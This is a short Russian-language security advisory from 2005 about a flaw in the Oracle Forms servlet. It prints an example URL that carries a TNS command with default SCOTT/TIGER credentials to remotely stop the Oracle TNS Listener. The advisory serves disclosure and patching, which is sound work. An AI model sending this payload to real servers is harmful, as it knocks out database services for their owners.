Security Lab

Повышение привилегий в Oracle Forms

Дата публикации:10.10.2005
Всего просмотров:1788
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Oracle Forms

Описание:
Уязвимость позволяет удаленному пользователю остановить процесс TNS Listener.

Если TNS Listener защищен паролем, удаленный пользователь может с помощью специально сформированного URL остановить работу процесса. Пример:

http://[target]:8888/forms90/f90servlet?form=
test.fmx&userid=SCOTT/TIGER@(DESCRIPTION=
(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)
(HO ST=server)(PORT=1521)))(CONNECT_DATA=
(COMMAND=STOP)(SERVICE=LISTENER)))&
buffer_records=NO&debug_messages=NO&array=YES
& query_only=NO&quiet=NO&RENDER=YES

URL производителя: oracle.com

Решение: Установите исправление с сайта производителя.

Ссылки: Shutdown TNS Listener via Oracle Forms Servlet